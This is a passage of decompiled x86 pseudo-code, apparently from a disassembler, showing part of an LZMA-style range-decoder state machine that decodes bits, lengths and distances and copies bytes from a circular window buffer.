                                                                                                                                                                                                              													__ax =  *__esi;
                                                                                                                                                                                                              													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              													__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              														__cx = __ax;
                                                                                                                                                                                                              														_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                              														__ebx = _t170;
                                                                                                                                                                                                              														__cx = __ax >> 5;
                                                                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                                                                              														 *__esi = __ax;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              														0x800 = 0x800 - __edi;
                                                                                                                                                                                                              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              														__ebx = __ebx + __ebx;
                                                                                                                                                                                                              														 *__esi = __cx;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              														continue;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														goto L46;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												L54:
                                                                                                                                                                                                              												_t173 = __ebp - 0x34;
                                                                                                                                                                                                              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                              												__eflags =  *_t173;
                                                                                                                                                                                                              												goto L55;
                                                                                                                                                                                                              											case 0xf:
                                                                                                                                                                                                              												L58:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t203 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t203;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												L60:
                                                                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                                                                              													L55:
                                                                                                                                                                                                              													__al =  *(__ebp - 0x44);
                                                                                                                                                                                                              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                              													goto L56;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												L61:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__edx = __ebx + __ebx;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              													__cx = __ax;
                                                                                                                                                                                                              													_t217 = __edx + 1; // 0x1
                                                                                                                                                                                                              													__ebx = _t217;
                                                                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													goto L60;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L58;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 0x10:
                                                                                                                                                                                                              												L109:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t365 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t365;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												goto L111;
                                                                                                                                                                                                              											case 0x11:
                                                                                                                                                                                                              												L68:
                                                                                                                                                                                                              												_t614 =  *(_t621 - 0x58);
                                                                                                                                                                                                              												 *(_t621 - 0x84) = 0x12;
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													L132:
                                                                                                                                                                                                              													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                                              													goto L133;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 0x12:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              													 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                              													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                              													while(1) {
                                                                                                                                                                                                              														L132:
                                                                                                                                                                                                              														 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                                              														goto L133;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                              												goto L130;
                                                                                                                                                                                                              											case 0x13:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													_t469 = __ebp - 0x58;
                                                                                                                                                                                                              													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                              													__eflags =  *_t469;
                                                                                                                                                                                                              													 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                              													 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                              													L144:
                                                                                                                                                                                                              													 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                              													goto L145;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              												 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                              												L130:
                                                                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              												 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                              												goto L144;
                                                                                                                                                                                                              											case 0x14:
                                                                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                              												 *(_t621 - 0x88) = _t542;
                                                                                                                                                                                                              												goto L1;
                                                                                                                                                                                                              											case 0x15:
                                                                                                                                                                                                              												__eax = 0;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              												__al = __al & 0x000000fd;
                                                                                                                                                                                                              												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              												goto L120;
                                                                                                                                                                                                              											case 0x16:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                              												__eflags = __eax - 4;
                                                                                                                                                                                                              												if(__eax >= 4) {
                                                                                                                                                                                                              													_push(3);
                                                                                                                                                                                                              													_pop(__eax);
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              												 *(__ebp - 0x40) = 6;
                                                                                                                                                                                                              												__eax = __eax << 7;
                                                                                                                                                                                                              												 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              												goto L145;
                                                                                                                                                                                                              											case 0x17:
                                                                                                                                                                                                              												L145:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              												 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                                              												goto L149;
                                                                                                                                                                                                              											case 0x18:
                                                                                                                                                                                                              												L146:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t484 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t484;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												L148:
                                                                                                                                                                                                              												_t487 = __ebp - 0x48;
                                                                                                                                                                                                              												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                              												__eflags =  *_t487;
                                                                                                                                                                                                              												L149:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                              												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                              													__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                                              													0 = 1;
                                                                                                                                                                                                              													__eax = 1 << __cl;
                                                                                                                                                                                                              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              													while(1) {
                                                                                                                                                                                                              														 *(_t621 - 0x88) = _t542;
                                                                                                                                                                                                              														goto L1;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              													__cx = __ax;
                                                                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                                                                              													__eax = __eax - __ecx;
                                                                                                                                                                                                              													__edx = __edx + 1;
                                                                                                                                                                                                              													__eflags = __edx;
                                                                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                                                                              													 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													goto L148;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L146;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 0x19:
                                                                                                                                                                                                              												__eflags = __ebx - 4;
                                                                                                                                                                                                              												if(__ebx < 4) {
                                                                                                                                                                                                              													 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                              													L119:
                                                                                                                                                                                                              													_t393 = __ebp - 0x2c;
                                                                                                                                                                                                              													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                              													__eflags =  *_t393;
                                                                                                                                                                                                              													L120:
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													if(__eax == 0) {
                                                                                                                                                                                                              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                              														goto L170;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                              													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                              														goto L171;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                              													_t400 = __ebp - 0x60;
                                                                                                                                                                                                              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                              													__eflags =  *_t400;
                                                                                                                                                                                                              													goto L123;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx = __ebx;
                                                                                                                                                                                                              												__eax = __ebx;
                                                                                                                                                                                                              												__ecx = __ebx >> 1;
                                                                                                                                                                                                              												__eax = __ebx & 0x00000001;
                                                                                                                                                                                                              												__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                              												__al = __al | 0x00000002;
                                                                                                                                                                                                              												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                              												__eflags = __ebx - 0xe;
                                                                                                                                                                                                              												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              												if(__ebx >= 0xe) {
                                                                                                                                                                                                              													__ebx = 0;
                                                                                                                                                                                                              													 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                              													L102:
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                              													if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                              														__eax = __eax + __ebx;
                                                                                                                                                                                                              														 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                              														 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              														__eax =  *(__ebp - 4);
                                                                                                                                                                                                              														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                                                                              														L108:
                                                                                                                                                                                                              														__ebx = 0;
                                                                                                                                                                                                              														 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              														 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                              														 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                              														 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                              														L112:
                                                                                                                                                                                                              														__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              															_t391 = __ebp - 0x2c;
                                                                                                                                                                                                              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                                              															__eflags =  *_t391;
                                                                                                                                                                                                              															goto L119;
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                              														__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              														__esi = __edi + __eax;
                                                                                                                                                                                                              														 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              														__ax =  *__esi;
                                                                                                                                                                                                              														__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                              														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                                              														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                              														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                                              															__ecx = 0;
                                                                                                                                                                                                              															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                                              															__ecx = 1;
                                                                                                                                                                                                              															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                              															__ebx = 1;
                                                                                                                                                                                                              															__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                                              															__ebx = 1 << __cl;
                                                                                                                                                                                                              															__ecx = 1 << __cl;
                                                                                                                                                                                                              															__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                                              															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                                              															__cx = __ax;
                                                                                                                                                                                                              															__cx = __ax >> 5;
                                                                                                                                                                                                              															__eax = __eax - __ecx;
                                                                                                                                                                                                              															__edi = __edi + 1;
                                                                                                                                                                                                              															__eflags = __edi;
                                                                                                                                                                                                              															 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              															 *__esi = __ax;
                                                                                                                                                                                                              															 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                              															 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                                              															0x800 = 0x800 - __ecx;
                                                                                                                                                                                                              															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                                              															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                              															 *__esi = __dx;
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              															L111:
                                                                                                                                                                                                              															_t368 = __ebp - 0x48;
                                                                                                                                                                                                              															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                                              															__eflags =  *_t368;
                                                                                                                                                                                                              															goto L112;
                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                              															goto L109;
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                                              														__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                              														__ebx = __ebx | 0x00000001;
                                                                                                                                                                                                              														__eflags = __ebx;
                                                                                                                                                                                                              														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              														L101:
                                                                                                                                                                                                              														_t338 = __ebp - 0x48;
                                                                                                                                                                                                              														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                              														__eflags =  *_t338;
                                                                                                                                                                                                              														goto L102;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														goto L99;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__edx =  *(__ebp - 4);
                                                                                                                                                                                                              												__eax = __eax - __ebx;
                                                                                                                                                                                                              												 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                                              												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                                              												goto L108;
                                                                                                                                                                                                              											case 0x1a:
                                                                                                                                                                                                              												L56:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                              												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                                              												__al =  *(__ebp - 0x5c);
                                                                                                                                                                                                              												__edx =  *(__ebp - 8);
                                                                                                                                                                                                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                              												 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                                              												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                                              												__eax = __ecx + 1;
                                                                                                                                                                                                              												__edx = 0;
                                                                                                                                                                                                              												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                              												__edx = _t192;
                                                                                                                                                                                                              												goto L79;
                                                                                                                                                                                                              											case 0x1b:
                                                                                                                                                                                                              												L75:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                              												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__edx =  *(__ebp - 8);
                                                                                                                                                                                                              												__cl =  *(__eax + __edx);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                              												 *(__eax + __edx) = __cl;
                                                                                                                                                                                                              												__eax = __eax + 1;
                                                                                                                                                                                                              												__edx = 0;
                                                                                                                                                                                                              												_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                              												__edx = _t274;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                              												_t283 = __ebp - 0x64;
                                                                                                                                                                                                              												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                              												__eflags =  *_t283;
                                                                                                                                                                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                              												L79:
                                                                                                                                                                                                              												 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                                              												goto L80;
                                                                                                                                                                                                              											case 0x1c:
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													L123:
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                              													if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                              														break;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                              													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__edx =  *(__ebp - 8);
                                                                                                                                                                                                              													__cl =  *(__eax + __edx);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              													 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                              													 *(__eax + __edx) = __cl;
                                                                                                                                                                                                              													__eax = __eax + 1;
                                                                                                                                                                                                              													__edx = 0;
                                                                                                                                                                                                              													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                              													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                              													__edx = _t414;
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                              													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                              													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x30);
                                                                                                                                                                                                              													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                              													 *(__ebp - 0x14) = _t414;
                                                                                                                                                                                                              													if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                                                              														continue;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														L80:
                                                                                                                                                                                                              														 *(__ebp - 0x88) = 2;
